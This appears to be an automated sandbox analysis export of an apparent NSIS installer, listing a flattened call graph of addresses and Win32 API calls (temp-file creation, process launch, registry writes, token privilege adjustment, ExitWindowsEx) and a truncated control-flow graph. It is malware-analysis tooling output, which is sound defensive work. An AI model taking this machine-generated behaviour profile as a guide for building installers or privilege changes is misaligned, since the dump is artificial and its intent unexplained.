4282->4278 4283->4263 3848 40176f 3849 402da6 17 API calls 3848->3849 3850 401776 3849->3850 3851 401796 3850->3851 3852 40179e 3850->3852 3887 406507 lstrcpynW 3851->3887 3888 406507 lstrcpynW 3852->3888 3855 40179c 3859 40678e 5 API calls 3855->3859 3856 4017a9 3857 405dd6 3 API calls 3856->3857 3858 4017af lstrcatW 3857->3858 3858->3855 3863 4017bb 3859->3863 3860 40683d 2 API calls 3860->3863 3861 405fd2 2 API calls 3861->3863 3863->3860 3863->3861 3864 4017cd CompareFileTime 3863->3864 3865 40188d 3863->3865 3871 406507 lstrcpynW 3863->3871 3874 406544 17 API calls 3863->3874 3880 405b67 MessageBoxIndirectW 3863->3880 3883 401864 3863->3883 3886 405ff7 GetFileAttributesW CreateFileW 3863->3886 3864->3863 3866 405569 24 API calls 3865->3866 3868 401897 3866->3868 3867 405569 24 API calls 3885 401879 3867->3885 3869 4032b4 35 API calls 3868->3869 3870 4018aa 3869->3870 3872 4018be SetFileTime 3870->3872 3873 4018d0 FindCloseChangeNotification 3870->3873 3871->3863 3872->3873 3875 4018e1 3873->3875 3873->3885 3874->3863 3876 4018e6 3875->3876 3877 4018f9 3875->3877 3878 406544 17 API calls 3876->3878 3879 406544 17 API calls 3877->3879 3881 4018ee lstrcatW 3878->3881 3882 401901 3879->3882 3880->3863 3881->3882 3884 405b67 MessageBoxIndirectW 3882->3884 3883->3867 3883->3885 3884->3885 3886->3863 3887->3855 3888->3856 4291 401a72 4292 402d84 17 API calls 4291->4292 4293 401a7b 4292->4293 4294 402d84 17 API calls 4293->4294 4295 401a20 4294->4295 4296 401573 4297 401583 ShowWindow 4296->4297 4298 40158c 4296->4298 4297->4298 4299 40159a ShowWindow 4298->4299 4300 402c2a 4298->4300 4299->4300 4301 403b74 4302 403b7f 4301->4302 4303 403b86 GlobalAlloc 4302->4303 4304 403b83 4302->4304 4303->4304 4305 4023f4 4306 402da6 17 API calls 4305->4306 4307 402403 4306->4307 4308 402da6 17 API calls 4307->4308 4309 40240c 4308->4309 4310 402da6 17 API calls 4309->4310 4311 402416 GetPrivateProfileStringW 4310->4311 4312 4014f5 SetForegroundWindow 4313 402c2a 4312->4313 4314 401ff6 4315 402da6 17 API calls 4314->4315 4316 401ffd 4315->4316 4317 40683d 2 API calls 4316->4317 4318 402003 4317->4318 4320 402014 4318->4320 4321 40644e wsprintfW 4318->4321 4321->4320 3566 4034f7 SetErrorMode GetVersionExW 3567 403581 3566->3567 3568 403549 GetVersionExW 3566->3568 3569 4035da 3567->3569 3570 4068d4 5 API calls 3567->3570 3568->3567 3571 406864 3 API calls 3569->3571 3570->3569 3572 4035f0 lstrlenA 3571->3572 3572->3569 3573 403600 3572->3573 3574 4068d4 5 API calls 3573->3574 3575 403607 3574->3575 3576 4068d4 5 API calls 3575->3576 3577 40360e 3576->3577 3578 4068d4 5 API calls 3577->3578 3579 40361a #17 OleInitialize SHGetFileInfoW 3578->3579 3656 406507 lstrcpynW 3579->3656 3582 403667 GetCommandLineW 3657 406507 lstrcpynW 3582->3657 3584 403679 3585 405e03 CharNextW 3584->3585 3586 40369f CharNextW 3585->3586 3591 4036b0 3586->3591 3587 4037ae 3588 4037c2 GetTempPathW 3587->3588 3658 4034c6 3588->3658 3590 4037da 3592 403834 DeleteFileW 3590->3592 3593 4037de GetWindowsDirectoryW lstrcatW 3590->3593 3591->3587 3594 405e03 CharNextW 3591->3594 3601 4037b0 3591->3601 3668 40307d GetTickCount GetModuleFileNameW 3592->3668 3595 4034c6 12 API calls 3593->3595 3594->3591 3597 4037fa 3595->3597 3597->3592 3600 4037fe GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3597->3600 3598 403847 3599 403a23 ExitProcess OleUninitialize 3598->3599 3606 405e03 CharNextW 3598->3606 3640 4038fc 3598->3640 3603 403a33 3599->3603 3604 403a48 3599->3604 3605 4034c6 12 API calls 3600->3605 3752 406507 lstrcpynW 3601->3752 3757 405b67 3603->3757 3609 403a50 GetCurrentProcess OpenProcessToken 3604->3609 3610 403ac6 ExitProcess 3604->3610 3611 40382c 3605->3611 3622 403869 3606->3622 3615 403a96 3609->3615 3616 403a67 LookupPrivilegeValueW AdjustTokenPrivileges 3609->3616 3611->3592 3611->3599 3612 40390b 3612->3599 3617 4068d4 5 API calls 3615->3617 3616->3615 3620 403a9d 3617->3620 3618 4038d2 3624 405ede 18 API calls 3618->3624 3619 403913 3623 405ad2 5 API calls 3619->3623 3621 403ab2 ExitWindowsEx 3620->3621 3625 403abf 3620->3625 3621->3610 3621->3625 3622->3618 3622->3619 3626 403918 lstrcatW 3623->3626 3627 4038de 3624->3627 3628 40140b 2 API calls 3625->3628 3629 403934 lstrcatW lstrcmpiW 3626->3629 3630 403929 lstrcatW 3626->3630 3627->3599 3753 406507 lstrcpynW 3627->3753 3628->3610 3629->3612 3631 403954 3629->3631 3630->3629 3633 403960 3631->3633 3634 403959 3631->3634 3638 405ab5 2 API calls 3633->3638 3637 405a38 4 API calls 3634->3637 3635 4038f1 3754 406507 lstrcpynW 3635->3754 3641 40395e 3637->3641 3639 403965 SetCurrentDirectoryW 3638->3639 3642 403982 3639->3642 3643 403977 3639->3643 3696 403bb6 3640->3696 3641->3639 3756 406507 lstrcpynW 3642->3756 3755 406507 lstrcpynW 3643->3755 3646 406544 17 API calls 3647 4039c4 DeleteFileW 3646->3647 3648 4039d0 CopyFileW 3647->3648 3653 40398f 3647->3653 3648->3653 3649 403a1a 3650 4062c7 36 API calls 3649->3650 3650->3612 3651 4062c7 36 API calls 3651->3653 3652 406544 17 API calls 3652->3653 3653->3646 3653->3649 3653->3651 3653->3652 3654 405aea 2 API calls 3653->3654 3655 403a04 CloseHandle 3653->3655 3654->3653 3655->3653 3656->3582 3657->3584 3659 40678e 5 API calls 3658->3659 3660 4034d2 3659->3660 3661 4034dc 3660->3661 3662 405dd6 3 API calls 3660->3662 3661->3590 3663 4034e4 3662->3663 3664 405ab5 2 API calls 3663->3664 3665 4034ea 3664->3665 3761 406026 3665->3761 3765 405ff7 GetFileAttributesW CreateFileW 3668->3765 3670 4030bd 3671 4030cd 3670->3671 3766 406507 lstrcpynW 3670->3766 3671->3598 3673 4030e3 3674 405e22 2 API calls 3673->3674 3675 4030e9 3674->3675 3767 406507 lstrcpynW 3675->3767 3677 4030f4 GetFileSize 3692 4031ee 3677->3692 3695 40310b 3677->3695 3679 4031f7 3679->3671 3681 403227 GlobalAlloc 3679->3681 3804 4034af SetFilePointer 3679->3804 3779 4034af SetFilePointer 3681->3779 3683 40325a 3685 403019 6 API calls 3683->3685 3685->3671 3686 403210 3688 403499 ReadFile 3686->3688 3687 403242 3780 4032b4 3687->3780 3690 40321b 3688->3690 3690->3671 3690->3681 3691 403019 6 API calls 3691->3695 3768 403019 3692->3768 3693 40324e 3693->3671 3693->3693 3694 40328b SetFilePointer 3693->3694 3694->3671 3695->3671 3695->3683 3695->3691 3695->3692 3801 403499 3695->3801 3697 4068d4 5 API calls 3696->3697 3698 403bca 3697->3698 3699 403bd0 GetUserDefaultUILanguage 3698->3699 3700 403be2 3698->3700 3813 40644e wsprintfW 3699->3813 3702 4063d5 3 API calls 3700->3702 3704 403c12 3702->3704 3703 403be0 3814 403e8c 3703->3814 3705 403c31 lstrcatW 3704->3705 3707 4063d5 3 API calls 3704->3707 3705->3703 3707->3705 3709 405ede 18 API calls 3710 403c63 3709->3710 3711 403cf7 3710->3711 3713 4063d5 3 API calls 3710->3713 3712 405ede 18 API calls 3711->3712 3714 403cfd 3712->3714 3715 403c95 3713->3715 3716 403d0d LoadImageW 3714->3716 3717 406544 17 API calls 3714->3717 3715->3711 3721 403cb6 lstrlenW 3715->3721 3725 405e03 CharNextW 3715->3725 3718 403db3 3716->3718 3719 403d34 RegisterClassW 3716->3719 3717->3716 3720 40140b 2 API calls 3718->3720 3722 403dbd 3719->3722 3723 403d6a SystemParametersInfoW CreateWindowExW 3719->3723 3724 403db9 3720->3724 3726 403cc4 lstrcmpiW 3721->3726 3727 403cea 3721->3727 3722->3612 3723->3718 3724->3722 3732 403e8c 18 API calls 3724->3732 3729 403cb3 3725->3729 3726->3727 3730 403cd4 GetFileAttributesW 3726->3730 3728 405dd6 3 API calls 3727->3728 3733 403cf0 3728->3733 3729->3721 3731 403ce0 3730->3731 3731->3727 3734 405e22 2 API calls 3731->3734 3735 403dca 3732->3735 3822 406507 lstrcpynW 3733->3822 3734->3727 3737 403dd6 ShowWindow 3735->3737 3738 403e59 3735->3738 3740 406864 3 API calls 3737->3740 3823 40563c OleInitialize 3738->3823 3742 403dee 3740->3742 3741 403e5f 3743 403e7b 3741->3743 3745 403e63 3741->3745 3744 403dfc GetClassInfoW 3742->3744 3747 406864 3 API calls 3742->3747 3746 40140b 2 API calls 3743->3746 3748 403e10 GetClassInfoW RegisterClassW 3744->3748 3749 403e26 DialogBoxParamW 3744->3749 3745->3722 3750 40140b 2 API calls 3745->3750 3746->3722 3747->3744 3748->3749 3751 40140b 2 API calls 3749->3751 3750->3722 3751->3722 3752->3588 3753->3635 3754->3640 3755->3642 3756->3653 3758 405b7c 3757->3758 3759 403a40 ExitProcess 3758->3759 3760 405b90 MessageBoxIndirectW 3758->3760 3760->3759 3762 406033 GetTickCount GetTempFileNameW 3761->3762 3763 4034f5 3762->3763 3764 406069 3762->3764 3763->3590 3764->3762 3764->3763 3765->3670 3766->3673 3767->3677 3769 403022 3768->3769 3770 40303a 3768->3770 3771 403032 3769->3771 3772 40302b DestroyWindow 3769->3772 3773 403042 3770->3773 3774 40304a GetTickCount 3770->3774 3771->3679 3772->3771 3775 406910 2 API calls 3773->3775 3776 403058 CreateDialogParamW ShowWindow 3774->3776 3777 40307b 3774->3777 3778 403048 3775->3778 3776->3777 3777->3679 3778->3679 3779->3687 3781 4032cd 3780->3781 3782 4032f8 3781->3782 3812 4034af SetFilePointer 3781->3812 3784 403499 ReadFile 3782->3784 3785 403303 3784->3785 3786 403315 GetTickCount 3785->3786 3787 403439 3785->3787 3789 403423 3785->3789 3797 403328 3786->3797 3788 40343d 3787->3788 3793 403455 3787->3793 3790 403499 ReadFile 3788->3790 3789->3693 3790->3789 3791 403499 ReadFile 3791->3793 3792 403499 ReadFile 3792->3797 3793->3789 3793->3791 3794 4060a9 WriteFile 3793->3794 3794->3793 3796 40338e GetTickCount 3796->3797 3797->3789 3797->3792 3797->3796 3798 4033b7 MulDiv wsprintfW 3797->3798 3800 4060a9 WriteFile 3797->3800 3805 406a4f 3797->3805 3799 405569 24 API calls 3798->3799 3799->3797 3800->3797 3802 40607a ReadFile 3801->3802 3803 4034ac 3802->3803 3803->3695 3804->3686 3806 406a74 3805->3806 3809 406a7c 3805->3809 3806->3797 3807 406b03 GlobalFree 3808 406b0c GlobalAlloc 3807->3808 3808->3806 3808->3809 3809->3806 3809->3807 3809->3808 3810 406b83 GlobalAlloc 3809->3810 3811 406b7a GlobalFree 3809->3811 3810->3806 3810->3809 3811->3810 3812->3782 3813->3703 3815 403ea0 3814->3815 3830 40644e wsprintfW 3815->3830 3817 403f11 3818 403f45 18 API calls 3817->3818 3820 403f16 3818->3820 3819 403c41 3819->3709 3820->3819 3821 406544 17 API calls 3820->3821 3821->3820 3822->3711 3824 4044af SendMessageW 3823->3824 3825 40565f 3824->3825 3828 401389 2 API calls 3825->3828 3829 405686 3825->3829 3826 4044af SendMessageW 3827 405698 OleUninitialize 3826->3827 3827->3741 3828->3825 3829->3826 3830->3817 4322 401b77 4323 402da6 17 API calls 4322->4323 4324 401b7e 4323->4324 4325 402d84 17 API calls 4324->4325 4326 401b87 wsprintfW 4325->4326 4327 402c2a 4326->4327 4328 40167b 4329 402da6 17 API calls 4328->4329 4330 401682 4329->4330 4331 402da6 17 API calls 4330->4331 4332 40168b 4331->4332 4333 402da6 17 API calls 4332->4333 4334 401694 MoveFileW 4333->4334 4335 4016a7 4334->4335 4341 4016a0 4334->4341 4336 4022f6 4335->4336 4337 40683d 2 API calls 4335->4337 4339 4016b6 4337->4339 4338 401423 24 API calls 4338->4336 4339->4336 4340 4062c7 36 API calls 4339->4340 4340->4341 4341->4338 4342 406bfe 4343 406a82 4342->4343 4344 4073ed 4343->4344 4345 406b03 GlobalFree 4343->4345 4346 406b0c GlobalAlloc 4343->4346 4347 406b83 GlobalAlloc 4343->4347 4348 406b7a GlobalFree 4343->4348 4345->4346 4346->4343 4346->4344 4347->4343 4347->4344 4348->4347 4349 4019ff 4350 402da6 17 API calls 4349->4350 4351 401a06 4350->4351 4352 402da6 17 API calls 4351->4352 4353 401a0f 4352->4353 4354 401a16 lstrcmpiW 4353->4354 4355 401a28 lstrcmpW 4353->4355 4356 401a1c 4354->4356 4355->4356 4357 4022ff 4358 402da6 17 API calls 4357->4358 4359 402305 4358->4359 4360 402da6 17 API calls 4359->4360 4361 40230e 4360->4361 4362 402da6 17 API calls 4361->4362 4363 402317 4362->4363 4364 40683d 2 API calls 4363->4364 4365 402320 4364->4365 4366 402331 lstrlenW lstrlenW 4365->4366 4370 402324 4365->4370 4368 405569 24 API calls 4366->4368 4367 405569 24 API calls 4371 40232c 4367->4371 4369 40236f SHFileOperationW 4368->4369 4369->4370 4369->4371 4370->4367 4370->4371 4372 401000 4373 401037 BeginPaint GetClientRect 4372->4373 4374 40100c DefWindowProcW 4372->4374 4376 4010f3 4373->4376 4377 401179 4374->4377 4378 401073 CreateBrushIndirect FillRect DeleteObject 4376->4378 4379 4010fc 4376->4379 4378->4376 4380 401102 CreateFontIndirectW 4379->4380 4381 401167 EndPaint 4379->4381 4380->4381 4382 401112 6 API calls 4380->4382 4381->4377 4382->4381 4383 401d81 4384 401d94 GetDlgItem 4383->4384 4385 401d87 4383->4385 4386 401d8e 4384->4386 4387 402d84 17 API calls 4385->4387 4388 401dd5 GetClientRect LoadImageW SendMessageW 4386->4388 4389 402da6 17 API calls 4386->4389 4387->4386 4391 401e33 4388->4391 4393 401e3f 4388->4393 4389->4388 4392 401e38 DeleteObject 4391->4392 4391->4393 4392->4393 4394 401503 4395 40150b 4394->4395 4397 40151e 4394->4397 4396 402d84 17 API calls 4395->4396 4396->4397 4398 402383 4399 40238a 4398->4399 4403 40239d 4398->4403 4400 406544 17 API calls 4399->4400 4401 402397 4400->4401 4402 405b67 MessageBoxIndirectW 4401->4402 4402->4403 4404 402c05 SendMessageW 4405 402c2a 4404->4405 4406 402c1f InvalidateRect 4404->4406 4406->4405 4414 40248a 4415 402da6 17 API calls 4414->4415 4416 40249c 4415->4416 4417 402da6 17 API calls 4416->4417 4418 4024a6 4417->4418 4431 402e36 4418->4431 4421 4024de 4424 4024ea 4421->4424 4426 402d84 17 API calls 4421->4426 4422 40292e 4423 402da6 17 API calls 4425 4024d4 lstrlenW 4423->4425 4427 402509 RegSetValueExW 4424->4427 4428 4032b4 35 API calls 4424->4428 4425->4421 4426->4424 4429 40251f RegCloseKey 4427->4429 4428->4427 4429->4422 4432 402e51 4431->4432 4435 4063a2 4432->4435 4436 4063b1 4435->4436 4437 4024b6 4436->4437 4438 4063bc RegCreateKeyExW 4436->4438 4437->4421 4437->4422 4437->4423 4438->4437 4439 40290b 4440 402da6 17 API calls 4439->4440 4441 402912 FindFirstFileW 4440->4441 4442 40293a 4441->4442 4445 402925 4441->4445 4447 40644e wsprintfW 4442->4447 4444 402943 4448 406507 lstrcpynW 4444->4448 4447->4444 4448->4445 4449 40190c 4450 401943 4449->4450 4451 402da6 17 API calls 4450->4451 4452 401948 4451->4452 4453 405c13 67 API calls 4452->4453 4454 401951 4453->4454 4455 40490d 4456 404943 4455->4456 4457 40491d 4455->4457 4459 4044ca 8 API calls 4456->4459 4458 404463 18 API calls 4457->4458 4460 40492a SetDlgItemTextW 4458->4460 4461 40494f 4459->4461 4460->4456 4462 40190f 4463 402da6 17 API calls 4462->4463 4464 401916 4463->4464 4465 405b67 MessageBoxIndirectW 4464->4465 4466 40191f 4465->4466 4467 401491 4468 405569 24 API calls 4467->4468 4469 401498 4468->4469 4470 402891 4471 402898 4470->4471 4474 402ba9 4470->4474 4472 402d84 17 API calls 4471->4472 4473 40289f 4472->4473 4475 4028ae SetFilePointer 4473->4475 4475->4474 4476 4028be 4475->4476 4478 40644e wsprintfW 4476->4478 4478->4474 4479 401f12 4480 402da6 17 API calls 4479->4480 4481 401f18 4480->4481 4482 402da6 17 API calls 4481->4482 4483 401f21 4482->4483 4484 402da6 17 API calls 4483->4484 4485 401f2a 4484->4485 4486 402da6 17 API calls 4485->4486 4487 401f33 4486->4487 4488 401423 24 API calls 4487->4488 4489 401f3a 4488->4489 4496 405b2d ShellExecuteExW 4489->4496 4491 401f82 4492 40292e 4491->4492 4493 40697f 5 API calls 4491->4493 4494 401f9f CloseHandle 4493->4494 4494->4492 4496->4491 4497 402f93 4498 402fa5 SetTimer 4497->4498 4499 402fbe 4497->4499 4498->4499 4500 403013 4499->4500 4501 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4499->4501 4501->4500 4502 401d17 4503 402d84 17 API calls 4502->4503 4504 401d1d IsWindow 4503->4504 4505 401a20 4504->4505 4506 404599 lstrcpynW lstrlenW 4507 401b9b 4508 401ba8 4507->4508 4509 401bec 4507->4509 4510 401c31 4508->4510 4515 401bbf 4508->4515 4511 401bf1 4509->4511 4512 401c16 GlobalAlloc 4509->4512 4513 406544 17 API calls 4510->4513 4519 40239d 4510->4519 4511->4519 4528 406507 lstrcpynW 4511->4528 4514 406544 17 API calls 4512->4514 4517 402397 4513->4517 4514->4510 4526 406507 lstrcpynW 4515->4526 4522 405b67 MessageBoxIndirectW 4517->4522 4520 401c03 GlobalFree 4520->4519 4521 401bce 4527 406507 lstrcpynW 4521->4527 4522->4519 4524 401bdd 4529 406507 lstrcpynW 4524->4529 4526->4521 4527->4524 4528->4520 4529->4519 4530 40261c 4531 402da6 17 API calls 4530->4531 4532 402623 4531->4532 4535 405ff7 GetFileAttributesW CreateFileW 4532->4535 4534 40262f 4535->4534 4543 40149e 4544 4014ac PostQuitMessage 4543->4544 4545 40239d 4543->4545 4544->4545 4546 40259e 4556 402de6 4546->4556 4549 402d84 17 API calls 4550 4025b1 4549->4550 4551 40292e 4550->4551 4552 4025d9 RegEnumValueW 4550->4552 4553 4025cd RegEnumKeyW 4550->4553 4554 4025ee RegCloseKey 4552->4554 4553->4554 4554->4551 4557 402da6 17 API calls 4556->4557 4558 402dfd 4557->4558 4559 406374 RegOpenKeyExW 4558->4559 4560 4025a8 4559->4560 4560->4549 4561 404622 4562 40463a 4561->4562 4569 404754 4561->4569 4566 404463 18 API calls 4562->4566 4563 4047be 4564 404888 4563->4564 4565 4047c8 GetDlgItem 4563->4565 4572 4044ca 8 API calls 4564->4572 4567 4047e2 4565->4567 4568 404849 4565->4568 4571 4046a1 4566->4571 4567->4568 4576 404808 SendMessageW LoadCursorW SetCursor 4567->4576 4568->4564 4577 40485b 4568->4577 4569->4563 4569->4564 4570 40478f GetDlgItem SendMessageW 4569->4570 4594 404485 EnableWindow 4570->4594 4574 404463 18 API calls 4571->4574 4575 404883 4572->4575 4579 4046ae CheckDlgButton 4574->4579 4595 4048d1 4576->4595 4581 404871 4577->4581 4582 404861 SendMessageW 4577->4582 4578 4047b9 4584 4048ad SendMessageW 4578->4584 4592 404485 EnableWindow 4579->4592 4581->4575 4583 404877 SendMessageW 4581->4583 4582->4581 4583->4575 4584->4563 4587 4046cc GetDlgItem 4593 404498 SendMessageW 4587->4593 4589 4046e2 SendMessageW 4590 404708 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4589->4590 4591 4046ff GetSysColor 4589->4591 4590->4575 4591->4590 4592->4587 4593->4589 4594->4578 4598 405b2d ShellExecuteExW 4595->4598 4597 404837 LoadCursorW SetCursor 4597->4568 4598->4597 4599 4015a3 4600 402da6 17 API calls 4599->4600 4601 4015aa SetFileAttributesW 4600->4601 4602 4015bc 4601->4602 3538 401fa4 3539 402da6 17 API calls 3538->3539 3540 401faa 3539->3540 3541 405569 24 API calls 3540->3541 3542 401fb4 3541->3542 3553 405aea CreateProcessW 3542->3553 3545 401fdd CloseHandle 3548 40292e 3545->3548 3549 401fcf 3550 401fd4 3549->3550 3551 401fdf 3549->3551 3561 40644e wsprintfW 3550->3561 3551->3545 3554 401fba 3553->3554 3555 405b1d CloseHandle 3553->3555 3554->3545 3554->3548 3556 40697f WaitForSingleObject 3554->3556 3555->3554 3557 406999 3556->3557 3558 4069ab GetExitCodeProcess 3557->3558 3562 406910 3557->3562 3558->3549 3561->3545 3563 40692d PeekMessageW 3562->3563 3564 406923 DispatchMessageW 3563->3564 3565 40693d WaitForSingleObject 3563->3565 3564->3563 3565->3557 4603 4056a8 4604 405852 4603->4604 4605 4056c9 GetDlgItem GetDlgItem GetDlgItem 4603->4605 4606 405883 4604->4606 4607 40585b GetDlgItem CreateThread CloseHandle 4604->4607 4648 404498 SendMessageW 4605->4648 4610 4058ae 4606->4610 4611 4058d3 4606->4611 4612 40589a ShowWindow ShowWindow 4606->4612 4607->4606 4609 405739 4614 405740 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4609->4614 4613 40590e 4610->4613 4616 4058c2 4610->4616 4617 4058e8 ShowWindow 4610->4617 4618 4044ca 8 API calls 4611->4618 4650 404498 SendMessageW 4612->4650 4613->4611 4621 40591c SendMessageW 4613->4621 4619 405792 SendMessageW SendMessageW 4614->4619 4620 4057ae 4614->4620 4622 40443c SendMessageW 4616->4622 4624 405908 4617->4624 4625 4058fa 4617->4625 4623 4058e1 4618->4623 4619->4620 4627 4057c1 4620->4627 4628 4057b3 SendMessageW 4620->4628 4621->4623 4629 405935 CreatePopupMenu 4621->4629 4622->4611 4626 40443c SendMessageW 4624->4626 4630 405569 24 API calls 4625->4630 4626->4613 4632 404463 18 API calls 4627->4632 4628->4627 4631 406544 17 API calls 4629->4631 4630->4624 4633 405945 AppendMenuW 4631->4633 4634 4057d1 4632->4634 4635 405962 GetWindowRect 4633->4635 4636 405975 TrackPopupMenu 4633->4636 4637 4057da ShowWindow 4634->4637 4638 40580e GetDlgItem SendMessageW 4634->4638 4635->4636 4636->4623 4639 405990 4636->4639 4640 4057f0 ShowWindow 4637->4640 4641 4057fd 4637->4641 4638->4623 4642 405835 SendMessageW SendMessageW 4638->4642 4643 4059ac SendMessageW 4639->4643 4640->4641 4649 404498 SendMessageW 4641->4649 4642->4623 4643->4643 4644 4059c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4643->4644 4646 4059ee SendMessageW 4644->4646 4646->4646 4647 405a17 GlobalUnlock SetClipboardData CloseClipboard 4646->4647 4647->4623 4648->4609 4649->4638 4650->4610 4651 40202a 4652 402da6 17 API calls 4651->4652 4653 402031 4652->4653 4654 4068d4 5 API calls 4653->4654 4655 402040 4654->4655 4656 4020cc 4655->4656 4657 40205c GlobalAlloc 4655->4657 4657->4656 4658 402070 4657->4658 4659 4068d4 5 API calls 4658->4659 4660 402077 4659->4660 4661 4068d4 5 API calls 4660->4661 4662 402081 4661->4662 4662->4656 4666 40644e wsprintfW 4662->4666 4664 4020ba 4667 40644e wsprintfW 4664->4667 4666->4664 4667->4656 4668 40252a 4669 402de6 17 API calls 4668->4669 4670 402534 4669->4670 4671 402da6 17 API calls 4670->4671 4672 40253d 4671->4672 4673 402548 RegQueryValueExW 4672->4673 4675 40292e 4672->4675 4674 402568 4673->4674 4676 40256e RegCloseKey 4673->4676 4674->4676 4679 40644e wsprintfW 4674->4679 4676->4675 4679->4676 4680 404caa 4681 404cd6 4680->4681 4682 404cba 4680->4682 4684 404d09 4681->4684 4685 404cdc SHGetPathFromIDListW 4681->4685 4691 405b4b GetDlgItemTextW 4682->4691 4687 404cf3 SendMessageW 4685->4687 4688 404cec 4685->4688 4686 404cc7 SendMessageW 4686->4681 4687->4684 4689 40140b 2 API calls 4688->4689 4689->4687 4691->4686 4692 4021aa 4693 402da6 17 API calls 4692->4693 4694 4021b1 4693->4694 4695 402da6 17 API calls 4694->4695 4696 4021bb 4695->4696 4697 402da6 17 API calls 4696->4697 4698 4021c5 4697->4698 4699 402da6 17 API calls 4698->4699 4700 4021cf 4699->4700 4701 402da6 17 API calls 4700->4701 4702 4021d9 4701->4702 4703 402218 CoCreateInstance 4702->4703 4704 402da6 17 API calls 4702->4704 4707 402237 4703->4707 4704->4703 4705 401423 24 API calls 4706 4022f6 4705->4706 4707->4705 4707->4706 4708 401a30 4709 402da6 17 API calls 4708->4709 4710 401a39 ExpandEnvironmentStringsW 4709->4710 4711 401a4d 4710->4711 4713 401a60 4710->4713 4712 401a52 lstrcmpW 4711->4712 4711->4713 4712->4713 4719 4023b2 4720 4023c0 4719->4720 4721 4023ba 4719->4721 4723 4023ce 4720->4723 4724 402da6 17 API calls 4720->4724 4722 402da6 17 API calls 4721->4722 4722->4720 4725 4023dc 4723->4725 4726 402da6 17 API calls 4723->4726 4724->4723 4727 402da6 17 API calls 4725->4727 4726->4725 4728 4023e5 WritePrivateProfileStringW 4727->4728 4736 402434 4737 402467 4736->4737 4738 40243c 4736->4738 4739 402da6 17 API calls 4737->4739 4740 402de6 17 API calls 4738->4740 4741 40246e 4739->4741 4742 402443 4740->4742 4747 402e64 4741->4747 4744 402da6 17 API calls 4742->4744 4746 40247b 4742->4746 4745 402454 RegDeleteValueW RegCloseKey 4744->4745 4745->4746 4748 402e78 4747->4748 4750 402e71 4747->4750 4748->4750 4751 402ea9 4748->4751 4750->4746 4752 406374 RegOpenKeyExW 4751->4752 4753 402ed7 4752->4753 4754 402ee7 RegEnumValueW 4753->4754 4761 402f81 4753->4761 4763 402f0a 4753->4763 4755 402f71 RegCloseKey 4754->4755 4754->4763 4755->4761 4756 402f46 RegEnumKeyW 4757 402f4f RegCloseKey 4756->4757 4756->4763 4758 4068d4 5 API calls 4757->4758 4759 402f5f 4758->4759 4759->4761 4762 402f63 RegDeleteKeyW 4759->4762 4760 402ea9 6 API calls 4760->4763 4761->4750 4762->4761 4763->4755 4763->4756 4763->4757 4763->4760 4771 401735 4772 402da6 17 API calls 4771->4772 4773 40173c SearchPathW 4772->4773 4774 401757 4773->4774 4775 401d38 4776 402d84 17 API calls 4775->4776 4777 401d3f 4776->4777 4778 402d84 17 API calls 4777->4778 4779 401d4b GetDlgItem 4778->4779 4780 402638 4779->4780 4781 4014b8 4782 4014be 4781->4782 4783 401389 2 API calls 4782->4783 4784 4014c6 4783->4784 4792 40263e 4793 402652 4792->4793 4794 40266d 4792->4794 4797 402d84 17 API calls 4793->4797 4795 402672 4794->4795 4796 40269d 4794->4796 4798 402da6 17 API calls 4795->4798 4799 402da6 17 API calls 4796->4799 4804 402659 4797->4804 4800 402679 4798->4800 4801 4026a4 lstrlenW 4799->4801 4809 406529 WideCharToMultiByte 4800->4809 4801->4804 4803 40268d lstrlenA 4803->4804 4805 4026e7 4804->4805 4806 4026d1 4804->4806 4808 4060d8 5 API calls 4804->4808 4806->4805 4807 4060a9 WriteFile 4806->4807 4807->4805 4808->4806 4809->4803

                                  Executed Functions

                                  Function 004034F7 Relevance: 86.2, APIs: 34, Strings: 15, Instructions: 450stringfilecomCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 4034f7-403547 SetErrorMode GetVersionExW 1 403581-403588 0->1 2 403549-40357d GetVersionExW 0->2 3 403592-4035d2 1->3 4 40358a 1->4 2->1 5 4035d4-4035dc call 4068d4 3->5 6 4035e5 3->6 4->3 5->6 11 4035de 5->11 7 4035ea-4035fe call 406864 lstrlenA 6->7 13 403600-40361c call 4068d4 * 3 7->13 11->6 20 40362d-40368f #17 OleInitialize SHGetFileInfoW call 406507 GetCommandLineW call 406507 13->20 21 40361e-403624 13->21 28 403691-403693 20->28 29 403698-4036ab call 405e03 CharNextW 20->29 21->20 25 403626 21->25 25->20 28->29 32 4037a2-4037a8 29->32 33 4036b0-4036b6 32->33 34 4037ae 32->34 36 4036b8-4036bd 33->36 37 4036bf-4036c5 33->37 35 4037c2-4037dc GetTempPathW call 4034c6 34->35 46 403834-40384c DeleteFileW call 40307d 35->46 47 4037de-4037fc GetWindowsDirectoryW lstrcatW call 4034c6 35->47 36->36 36->37 39 4036c7-4036cb 37->39 40 4036cc-4036d0 37->40 39->40 41 403790-40379e call 405e03 40->41 42 4036d6-4036dc 40->42 41->32 61 4037a0-4037a1 41->61 44 4036f6-40372f 42->44 45 4036de-4036e5 42->45 51 403731-403736 44->51 52 40374b-403785 44->52 49 4036e7-4036ea 45->49 50 4036ec 45->50 62 403852-403858 46->62 63 403a23-403a31 ExitProcess OleUninitialize 46->63 47->46 66 4037fe-40382e GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034c6 47->66 49->44 49->50 50->44 51->52 56 403738-403740 51->56 58 403787-40378b 52->58 59 40378d-40378f 52->59 64 403742-403745 56->64 65 403747 56->65 58->59 67 4037b0-4037bd call 406507 58->67 59->41 61->32 68 40385e-403871 call 405e03 62->68 69 4038ff-403906 call 403bb6 62->69 71 403a33-403a42 call 405b67 ExitProcess 63->71 72 403a48-403a4e 63->72 64->52 64->65 65->52 66->46 66->63 67->35 87 4038c3-4038d0 68->87 88 403873-4038a8 68->88 81 40390b-40390e 69->81 77 403a50-403a65 GetCurrentProcess OpenProcessToken 72->77 78 403ac6-403ace 72->78 85 403a96-403aa4 call 4068d4 77->85 86 403a67-403a90 LookupPrivilegeValueW AdjustTokenPrivileges 77->86 82 403ad0 78->82 83 403ad3-403ad6 ExitProcess 78->83 81->63 82->83 94 403ab2-403abd ExitWindowsEx 85->94 95 403aa6-403ab0 85->95 86->85 91 4038d2-4038e0 call 405ede 87->91 92 403913-403927 call 405ad2 lstrcatW 87->92 90 